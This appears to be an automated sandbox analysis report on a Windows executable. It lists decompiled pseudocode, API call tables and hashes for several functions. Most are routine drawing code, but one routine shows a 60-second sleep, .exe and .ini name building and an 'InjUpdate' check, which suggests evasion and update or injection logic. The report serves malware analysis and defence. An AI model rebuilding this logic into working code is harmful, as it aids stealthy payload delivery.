                                                                                                                                                                                                                            0x0043f876
                                                                                                                                                                                                                            0x0043f876
                                                                                                                                                                                                                            0x0043f876
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f851

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SaveDC.GDI32 ref: 0043F756
                                                                                                                                                                                                                              • Part of subcall function 004398B8: GetWindowOrgEx.GDI32(?), ref: 004398C6
                                                                                                                                                                                                                              • Part of subcall function 004398B8: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 004398DC
                                                                                                                                                                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043F777
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 0043F78D
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 0043F7AF
                                                                                                                                                                                                                            • SetRect.USER32 ref: 0043F7DB
                                                                                                                                                                                                                            • DrawEdge.USER32(?,?,?,00000000), ref: 0043F7EA
                                                                                                                                                                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043F80F
                                                                                                                                                                                                                            • RestoreDC.GDI32(?,?), ref: 0043F880
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2976466617-0
                                                                                                                                                                                                                            • Opcode ID: c79d6f2aaaf99a46f52f279e4e3e1293840bbc328cda2cdb7d7d29bc77371f5b
                                                                                                                                                                                                                            • Instruction ID: 5550dfeaeb93720f68ac000546fd20648b8bffa49c9e266dbbfe82f03f6cc12f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c79d6f2aaaf99a46f52f279e4e3e1293840bbc328cda2cdb7d7d29bc77371f5b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2416671F002046BDB04EA99CC81FDE77A9AF49304F10416AF904EB396D778ED0587A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004751FC Relevance: 12.1, APIs: 8, Instructions: 85COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 45%
                                                                                                                                                                                                                            			E004751FC() {
				void* _v20;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebp;
				signed int _t20;
				short _t34;
				intOrPtr* _t39;
				short* _t51;
				signed int _t52;
				short _t53;
				struct tagRECT* _t54;

				GetWindowRect(GetDesktopWindow(), _t54);
				_t39 = E00429914(1);
				 *((intOrPtr*)( *_t39 + 0x40))();
				_t20 =  *((intOrPtr*)( *_t39 + 0x34))();
				_push(0);
				L00407638();
				_t52 = _t20;
				_push(0x26);
				_push(_t52);
				L00407380();
				if((_t20 & 0x00000100) == 0x100) {
					_t51 = E0040275C(0x404);
					E004032B4(_t51, 0x404);
					 *_t51 = 0x300;
					_t6 = _t51 + 4; // 0x4
					_t34 = _t6;
					_push(_t34);
					_push(0x100);
					_push(0);
					_push(_t52);
					L004073C0();
					_t53 = _t34;
					 *((short*)(_t51 + 2)) = _t53;
					if(_t53 != 0) {
						L00407308();
						 *((intOrPtr*)( *_t39 + 0x38))(_t51);
					}
					E0040277C(_t51);
				}
				_push(0xcc0020);
				_push(0);
				_push(0);
				_push(_t52);
				_push(_v32 - _v40);
				_push(_v36 - _v44);
				_push(0);
				_push(0);
				_push(E00425C68(E00429EDC(_t39)));
				L004072B8();
				_push(_t52);
				_push(0);
				L00407888();
				return _t39;
			}


















                                                                                                                                                                                                                            0x0047520a
                                                                                                                                                                                                                            0x0047521b
                                                                                                                                                                                                                            0x00475228
                                                                                                                                                                                                                            0x00475237
                                                                                                                                                                                                                            0x0047523a
                                                                                                                                                                                                                            0x0047523c
                                                                                                                                                                                                                            0x00475241
                                                                                                                                                                                                                            0x00475243
                                                                                                                                                                                                                            0x00475245
                                                                                                                                                                                                                            0x00475246
                                                                                                                                                                                                                            0x00475255
                                                                                                                                                                                                                            0x00475261
                                                                                                                                                                                                                            0x0047526c
                                                                                                                                                                                                                            0x00475271
                                                                                                                                                                                                                            0x00475276
                                                                                                                                                                                                                            0x00475276
                                                                                                                                                                                                                            0x00475279
                                                                                                                                                                                                                            0x0047527a
                                                                                                                                                                                                                            0x0047527f
                                                                                                                                                                                                                            0x00475281
                                                                                                                                                                                                                            0x00475282
                                                                                                                                                                                                                            0x00475287
                                                                                                                                                                                                                            0x00475289
                                                                                                                                                                                                                            0x00475290
                                                                                                                                                                                                                            0x00475293
                                                                                                                                                                                                                            0x0047529e
                                                                                                                                                                                                                            0x0047529e
                                                                                                                                                                                                                            0x004752a3
                                                                                                                                                                                                                            0x004752a3
                                                                                                                                                                                                                            0x004752a8
                                                                                                                                                                                                                            0x004752ad
                                                                                                                                                                                                                            0x004752af
                                                                                                                                                                                                                            0x004752b1
                                                                                                                                                                                                                            0x004752ba
                                                                                                                                                                                                                            0x004752c3
                                                                                                                                                                                                                            0x004752c4
                                                                                                                                                                                                                            0x004752c6
                                                                                                                                                                                                                            0x004752d4
                                                                                                                                                                                                                            0x004752d5
                                                                                                                                                                                                                            0x004752da
                                                                                                                                                                                                                            0x004752db
                                                                                                                                                                                                                            0x004752dd
                                                                                                                                                                                                                            0x004752eb

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00475204
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 0047520A
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 0047523C
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,00000026,00000000), ref: 00475246
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(00000000,00000000,00000100,00000004,00000000,00000026,00000000), ref: 00475282
                                                                                                                                                                                                                            • 73C9A8F0.GDI32(00000000,00000000,00000000,00000100,00000004,00000000,00000026,00000000), ref: 00475293
                                                                                                                                                                                                                            • 73CA97E0.GDI32(00000000,00000000,00000000,00CC0020,00CC0020,00000000,00000000,00000000,00CC0020,00000000,00000026,00000000), ref: 004752D5
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,00000000,00000000,00CC0020,00CC0020,00000000,00000000,00000000,00CC0020,00000000,00000026,00000000), ref: 004752DD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$B380DesktopRect
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2454875651-0
                                                                                                                                                                                                                            • Opcode ID: 94de3cdaf569bc05093e076c07835454fccb335de717688e3b24cf6573941b2d
                                                                                                                                                                                                                            • Instruction ID: cf87fae2104b332fff4ea17414f726447bb42f5c33e6fb1eed0e3625bbc1caf8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94de3cdaf569bc05093e076c07835454fccb335de717688e3b24cf6573941b2d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 222162317442016FD311FA79CC86F5E77989F89314F50453DFA48EB2C2CA79AC0587AA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004265A0 Relevance: 12.1, APIs: 8, Instructions: 79COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 26%
                                                                                                                                                                                                                            			E004265A0(void* __ebx) {
				intOrPtr _v8;
				char _v1000;
				char _v1004;
				char _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t45;
				intOrPtr _t52;
				void* _t54;
				void* _t55;

				_t54 = _t55;
				_v1036 = 0x300;
				_v1034 = 0x10;
				_t25 = E004029DC(_t24, 0x40,  &_v1032);
				_push(0);
				L00407638();
				_v8 = _t25;
				_push(_t54);
				_push(0x42669d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffbf8;
				_push(0x68);
				_t27 = _v8;
				_push(_t27);
				L00407380();
				_t45 = _t27;
				if(_t45 >= 0x10) {
					_push( &_v1032);
					_push(8);
					_push(0);
					_push(_v8);
					L004073C0();
					if(_v1004 != 0xc0c0c0) {
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
						_push(8);
						_push(_t45 - 8);
						_push(_v8);
						L004073C0();
					} else {
						_push( &_v1004);
						_push(1);
						_push(_t45 - 8);
						_push(_v8);
						L004073C0();
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						_push(7);
						_push(_t45 - 7);
						_push(_v8);
						L004073C0();
						_push( &_v1000);
						_push(1);
						_push(7);
						_push(_v8);
						L004073C0();
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(0x4266a4);
				_t29 = _v8;
				_push(_t29);
				_push(0);
				L00407888();
				return _t29;
			}

















                                                                                                                                                                                                                            0x004265a1
                                                                                                                                                                                                                            0x004265aa
                                                                                                                                                                                                                            0x004265b3
                                                                                                                                                                                                                            0x004265c7
                                                                                                                                                                                                                            0x004265cc
                                                                                                                                                                                                                            0x004265ce
                                                                                                                                                                                                                            0x004265d3
                                                                                                                                                                                                                            0x004265d8
                                                                                                                                                                                                                            0x004265d9
                                                                                                                                                                                                                            0x004265de
                                                                                                                                                                                                                            0x004265e1
                                                                                                                                                                                                                            0x004265e4
                                                                                                                                                                                                                            0x004265e6
                                                                                                                                                                                                                            0x004265e9
                                                                                                                                                                                                                            0x004265ea
                                                                                                                                                                                                                            0x004265ef
                                                                                                                                                                                                                            0x004265f4
                                                                                                                                                                                                                            0x00426600
                                                                                                                                                                                                                            0x00426601
                                                                                                                                                                                                                            0x00426603
                                                                                                                                                                                                                            0x00426608
                                                                                                                                                                                                                            0x00426609
                                                                                                                                                                                                                            0x00426618
                                                                                                                                                                                                                            0x00426674
                                                                                                                                                                                                                            0x00426675
                                                                                                                                                                                                                            0x0042667a
                                                                                                                                                                                                                            0x0042667e
                                                                                                                                                                                                                            0x0042667f
                                                                                                                                                                                                                            0x0042661a
                                                                                                                                                                                                                            0x00426620
                                                                                                                                                                                                                            0x00426621
                                                                                                                                                                                                                            0x00426628
                                                                                                                                                                                                                            0x0042662c
                                                                                                                                                                                                                            0x0042662d
                                                                                                                                                                                                                            0x00426640
                                                                                                                                                                                                                            0x00426641
                                                                                                                                                                                                                            0x00426646
                                                                                                                                                                                                                            0x0042664a
                                                                                                                                                                                                                            0x0042664b
                                                                                                                                                                                                                            0x00426656
                                                                                                                                                                                                                            0x00426657
                                                                                                                                                                                                                            0x00426659
                                                                                                                                                                                                                            0x0042665e
                                                                                                                                                                                                                            0x0042665f
                                                                                                                                                                                                                            0x0042665f
                                                                                                                                                                                                                            0x00426618
                                                                                                                                                                                                                            0x00426686
                                                                                                                                                                                                                            0x00426689
                                                                                                                                                                                                                            0x0042668c
                                                                                                                                                                                                                            0x00426691
                                                                                                                                                                                                                            0x00426694
                                                                                                                                                                                                                            0x00426695
                                                                                                                                                                                                                            0x00426697
                                                                                                                                                                                                                            0x0042669c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 004265CE
                                                                                                                                                                                                                            • 73C9AD70.GDI32(?,00000068,00000000,0042669D,?,00000000), ref: 004265EA
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 00426609
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 0042662D
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0042669D), ref: 0042664B
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 0042665F
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 0042667F
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,004266A4,0042669D,?,00000000), ref: 00426697
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 120756276-0
                                                                                                                                                                                                                            • Opcode ID: 0eb73cb19fcbebc97ca0d3b42b0b75fc3d023da046d704aae5c56db498695ba3
                                                                                                                                                                                                                            • Instruction ID: 805600ea143b9581a1e299db5fe5220b0691e616ed58bf122693d2d560596f25
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0eb73cb19fcbebc97ca0d3b42b0b75fc3d023da046d704aae5c56db498695ba3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 592174B1A04218FAEB10DBA5CD85F9E72ACEB08704F5104A6FB04F61C1D678AE54DB29
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00434530 Relevance: 12.1, APIs: 8, Instructions: 63COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E00434530(struct HDC__* __eax, void* __edx, void* __ebp, void* __eflags) {
				struct tagTEXTMETRICA _v112;
				void* __ebx;
				void* _t14;
				char* _t18;
				signed int _t19;
				signed int _t21;
				struct HDC__* _t27;
				signed int _t28;
				signed int _t30;
				signed int _t31;
				void* _t32;
				struct HDC__* _t38;
				struct tagTEXTMETRICA* _t40;

				_t40 =  &_v112;
				_t38 = __eax;
				_push(0);
				L00407638();
				_t27 = __eax;
				GetTextMetricsA(__eax, _t40);
				_t14 = SelectObject(_t27, E00424E24( *((intOrPtr*)(_t38 + 0x68)), _t27, _t32));
				GetTextMetricsA(_t27,  &(_v112.tmMaxCharWidth));
				SelectObject(_t27, _t14);
				_push(_t27);
				_push(0);
				L00407888();
				_t18 =  *0x49da40; // 0x49eb1c
				if( *_t18 == 0) {
					_t28 = _t40->tmHeight;
					_t19 = _v112.tmHeight;
					if(_t28 > _t19) {
						_t28 = _t19;
					}
					_t21 = GetSystemMetrics(6) << 2;
					if(_t28 < 0) {
						_t28 = _t28 + 3;
					}
					_t30 = _t21 + (_t28 >> 2);
				} else {
					if( *((char*)(_t38 + 0x1a5)) == 0) {
						_t31 = 6;
					} else {
						_t31 = 8;
					}
					_t30 = GetSystemMetrics(6) * _t31;
				}
				return E0043A75C(_t38, _v112 + _t30);
			}
















                                                                                                                                                                                                                            0x00434533
                                                                                                                                                                                                                            0x00434536
                                                                                                                                                                                                                            0x00434538
                                                                                                                                                                                                                            0x0043453a
                                                                                                                                                                                                                            0x0043453f
                                                                                                                                                                                                                            0x00434543
                                                                                                                                                                                                                            0x00434552
                                                                                                                                                                                                                            0x0043455f
                                                                                                                                                                                                                            0x00434566
                                                                                                                                                                                                                            0x0043456b
                                                                                                                                                                                                                            0x0043456c
                                                                                                                                                                                                                            0x0043456e
                                                                                                                                                                                                                            0x00434573
                                                                                                                                                                                                                            0x0043457b
                                                                                                                                                                                                                            0x0043459f
                                                                                                                                                                                                                            0x004345a2
                                                                                                                                                                                                                            0x004345a8
                                                                                                                                                                                                                            0x004345aa
                                                                                                                                                                                                                            0x004345aa
                                                                                                                                                                                                                            0x004345b3
                                                                                                                                                                                                                            0x004345b8
                                                                                                                                                                                                                            0x004345ba
                                                                                                                                                                                                                            0x004345ba
                                                                                                                                                                                                                            0x004345c2
                                                                                                                                                                                                                            0x0043457d
                                                                                                                                                                                                                            0x00434584
                                                                                                                                                                                                                            0x0043458d
                                                                                                                                                                                                                            0x00434586
                                                                                                                                                                                                                            0x00434586
                                                                                                                                                                                                                            0x00434586
                                                                                                                                                                                                                            0x0043459b
                                                                                                                                                                                                                            0x0043459b
                                                                                                                                                                                                                            0x004345d7

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 0043453A
                                                                                                                                                                                                                            • GetTextMetricsA.GDI32(00000000), ref: 00434543
                                                                                                                                                                                                                              • Part of subcall function 00424E24: CreateFontIndirectA.GDI32(?), ref: 00424F62
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00434552
                                                                                                                                                                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 0043455F
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00434566
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043456E
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00434594
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 004345AE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Metrics$ObjectSelectSystemText$B380CreateFontIndirect
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3751190600-0
                                                                                                                                                                                                                            • Opcode ID: ca349bb18a4b4453b776530d288914abec228c4fb22e44048b16066f4dcf4a7d
                                                                                                                                                                                                                            • Instruction ID: 5c0f3d8754ac9f53a552d955726f62212e9f387cfb0fc4aa99143b90913ccd9a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca349bb18a4b4453b776530d288914abec228c4fb22e44048b16066f4dcf4a7d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2111A951F083003BE31066798CC2B6B65C8DB99358F84183AF646D73D2D57CBC41836B
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00497CF0 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 323sleepCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E00497CF0(intOrPtr* __ebx, void* __edx, void* __edi, intOrPtr __esi, void* __fp0) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v21;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				void* _t84;
				intOrPtr _t88;
				void* _t91;
				intOrPtr _t92;
				void* _t96;
				intOrPtr _t100;
				intOrPtr _t105;
				intOrPtr _t112;
				char _t113;
				intOrPtr _t119;
				intOrPtr _t121;
				char _t122;
				void* _t129;
				intOrPtr _t172;
				void* _t173;
				intOrPtr _t174;
				intOrPtr _t176;
				intOrPtr _t178;
				void* _t185;
				char _t192;
				void* _t193;
				void* _t210;
				intOrPtr _t224;
				intOrPtr _t227;
				intOrPtr _t231;
				intOrPtr _t232;
				intOrPtr _t233;
				intOrPtr _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t243;
				intOrPtr _t244;
				intOrPtr _t249;
				intOrPtr _t252;
				intOrPtr _t255;
				intOrPtr _t258;
				intOrPtr _t261;
				intOrPtr _t265;
				intOrPtr _t273;
				intOrPtr _t274;
				void* _t281;
				void* _t291;

				_t291 = __fp0;
				_t267 = __esi;
				_t266 = __edi;
				_t191 = __ebx;
				_t273 = _t274;
				_t193 = 0xa;
				do {
					_push(0);
					_push(0);
					_t193 = _t193 - 1;
				} while (_t193 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t273);
				_push(0x49814b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t274;
				Sleep(0xea60);
				E004737B0( &_v28);
				_push(_v28);
				_push(0x498164);
				E00472D44(9, __ebx, _t193,  &_v32, __esi);
				_push(_v32);
				_push(".exe");
				E00404D40();
				E004737B0( &_v36);
				_push(_v36);
				_push(0x498164);
				E00472D44(7, __ebx, _t193,  &_v40, __esi);
				_push(_v40);
				_push(".ini");
				E00404D40();
				_v21 = 0;
				if(E00474D34(_t193) == 0) {
					L44:
					_pop(_t224);
					 *[fs:eax] = _t224;
					_push(0x498152);
					E004049E4( &_v84, 0xf);
					E004049C0( &_v20);
					return E004049E4( &_v12, 2);
				} else {
					_v16 = 1;
					while(1) {
						_t84 = _v16 - 1;
						if(_t84 == 0) {
							_t227 =  *0x49f174; // 0x0
							E00404A58( &_v20, _t227);
						} else {
							_t185 = _t84 - 1;
							if(_t185 == 0) {
								_t232 =  *0x49f174; // 0x0
								E00404A58( &_v20, _t232);
							} else {
								if(_t185 == 1) {
									_t233 =  *0x49f174; // 0x0
									E00404A58( &_v20, _t233);
								}
							}
						}
						_push(_t273);
						_push(0x497f86);
						_push( *[fs:eax]);
						 *[fs:eax] = _t274;
						_t88 =  *0x49f13c; // 0x2212354
						E004967D4(_t88, _t191, 0x498190);
						_t91 = E00474D50(_v20, _t191, _v8, _t267);
						_t280 = _t91;
						if(_t91 != 0) {
							break;
						}
						_t92 =  *0x49f13c; // 0x2212354
						E004967D4(_t92, _t191, 0x4981ec);
						_pop(_t231);
						 *[fs:eax] = _t231;
						_v16 = _v16 + 1;
						__eflags = _v16 - 4;
						if(_v16 != 4) {
							continue;
						} else {
							L18:
							if(_v21 == 0) {
								goto L44;
							}
							_v16 = 1;
							while(1) {
								_t96 = _v16 - 1;
								if(_t96 == 0) {
									_t234 =  *0x49f168; // 0x0
									E00404A58( &_v20, _t234);
								} else {
									_t129 = _t96 - 1;
									if(_t129 == 0) {
										_t238 =  *0x49f16c; // 0x0
										E00404A58( &_v20, _t238);
									} else {
										if(_t129 == 1) {
											_t239 =  *0x49f170; // 0x0
											E00404A58( &_v20, _t239);
										}
									}
								}
								_push(_t273);
								_push(0x498104);
								_push( *[fs:eax]);
								 *[fs:eax] = _t274;
								_t100 =  *0x49f13c; // 0x2212354
								E004967D4(_t100, _t191, 0x49820c);
								if(E00474D50(_v20, _t191, _v12, _t267) != 0) {
									break;
								}
								_pop(_t237);
								_pop(_t210);
								 *[fs:eax] = _t237;
								_v16 = _v16 + 1;
								__eflags = _v16 - 4;
								if(_v16 != 4) {
									continue;
								} else {
									goto L44;
								}
							}
							_t105 =  *0x49f13c; // 0x2212354
							E0049A3E0(_t105, _t191, 0, _t266, _t267, _t291);
							if( *0x49f148 == 0) {
								__eflags =  *0x49f149;
								if(__eflags == 0) {
									_t192 = 0;
									__eflags = 0;
								} else {
									_t192 = 1;
								}
							} else {
								_t192 = 1;
							}
							_push(_t273);
							_push(0x4980e6);
							_push( *[fs:eax]);
							 *[fs:eax] = _t274;
							E00472EF0( &_v84, _t192, _t210, 0);
							E00404DCC(_v84, 0x498230);
							if(0 == 0) {
								_t112 =  *0x49f1dc; // 0x0
								_t113 = E00473490(_t112, _t192, "InjUpdate", _v12, __eflags, 0, 0);
								__eflags = _t113;
								if(_t113 != 0) {
									E0045A800();
								}
							} else {
								_t119 =  *0x49f1dc; // 0x0
								if(E00473490(_t119, _t192, "InjUpdate", _v12, 0, 0, _t192) == 0) {
									_t121 =  *0x49f1dc; // 0x0
									_t122 = E00473490(_t121, _t192, "InjUpdate", _v12, __eflags, 0, 0);
									__eflags = _t122;
									if(_t122 != 0) {
										E0045A800();
									}
								} else {
									E0045A800();
								}
							}
							_pop(_t243);
							 *[fs:eax] = _t243;
							_pop(_t244);
							 *[fs:eax] = _t244;
							goto L44;
						}
					}
					_t191 = E00430158(_v8, 1);
					 *((intOrPtr*)( *_t191))( &_v48, 0);
					_t249 =  *0x49f1c8; // 0x0
					E004758E8(_v48, _t191,  &_v44, _t249);
					E00404A14(0x49f1c8, _v44);
					 *((intOrPtr*)( *_t191))( &_v56, 0);
					_t252 =  *0x49f15c; // 0x0
					E004758E8(_v56, _t191,  &_v52, _t252);
					E00404A14(0x49f15c, _v52);
					 *((intOrPtr*)( *_t191))( &_v64, 0);
					_t255 =  *0x49f168; // 0x0
					E004758E8(_v64, _t191,  &_v60, _t255);
					E00404A14(0x49f168, _v60);
					 *((intOrPtr*)( *_t191))( &_v72, 0);
					_t258 =  *0x49f16c; // 0x0
					E004758E8(_v72, _t191,  &_v68, _t258);
					E00404A14(0x49f168, _v68);
					_t267 =  *_t191;
					 *((intOrPtr*)( *_t191))( &_v80, 0);
					_t261 =  *0x49f170; // 0x0
					E004758E8(_v80, _t191,  &_v76, _t261);
					E00404A14(0x49f168, _v76);
					_t172 =  *0x49f15c; // 0x0
					_t173 = E00409628(_t172, _t273, _t280);
					_t174 =  *0x49f140; // 0x0
					E004957B4(_t174, _t173);
					_t176 =  *0x49f1c8; // 0x0
					_t281 = E00409628(_t176, _t273, _t280) -  *0x49f14c; // 0x6a
					if(_t281 <= 0) {
						_t178 =  *0x49f13c; // 0x2212354
						E004967D4(_t178, _t191, 0x4981ec);
					} else {
						_v21 = 1;
					}
					E00403BEC(_t191);
					E00409BAC(_v8);
					_pop(_t265);
					_pop(_t210);
					 *[fs:eax] = _t265;
					goto L18;
				}
			}


































































                                                                                                                                                                                                                            0x00497cf0
                                                                                                                                                                                                                            0x00497cf0
                                                                                                                                                                                                                            0x00497cf0
                                                                                                                                                                                                                            0x00497cf0
                                                                                                                                                                                                                            0x00497cf1
                                                                                                                                                                                                                            0x00497cf3
                                                                                                                                                                                                                            0x00497cf8
                                                                                                                                                                                                                            0x00497cf8
                                                                                                                                                                                                                            0x00497cfa
                                                                                                                                                                                                                            0x00497cfc
                                                                                                                                                                                                                            0x00497cfc
                                                                                                                                                                                                                            0x00497cff
                                                                                                                                                                                                                            0x00497d00
                                                                                                                                                                                                                            0x00497d01
                                                                                                                                                                                                                            0x00497d04
                                                                                                                                                                                                                            0x00497d05
                                                                                                                                                                                                                            0x00497d0a
                                                                                                                                                                                                                            0x00497d0d
                                                                                                                                                                                                                            0x00497d15
                                                                                                                                                                                                                            0x00497d1d
                                                                                                                                                                                                                            0x00497d22
                                                                                                                                                                                                                            0x00497d25
                                                                                                                                                                                                                            0x00497d32
                                                                                                                                                                                                                            0x00497d37
                                                                                                                                                                                                                            0x00497d3a
                                                                                                                                                                                                                            0x00497d47
                                                                                                                                                                                                                            0x00497d4f
                                                                                                                                                                                                                            0x00497d54
                                                                                                                                                                                                                            0x00497d57
                                                                                                                                                                                                                            0x00497d64
                                                                                                                                                                                                                            0x00497d69
                                                                                                                                                                                                                            0x00497d6c
                                                                                                                                                                                                                            0x00497d79
                                                                                                                                                                                                                            0x00497d7e
                                                                                                                                                                                                                            0x00497d89
                                                                                                                                                                                                                            0x0049811b
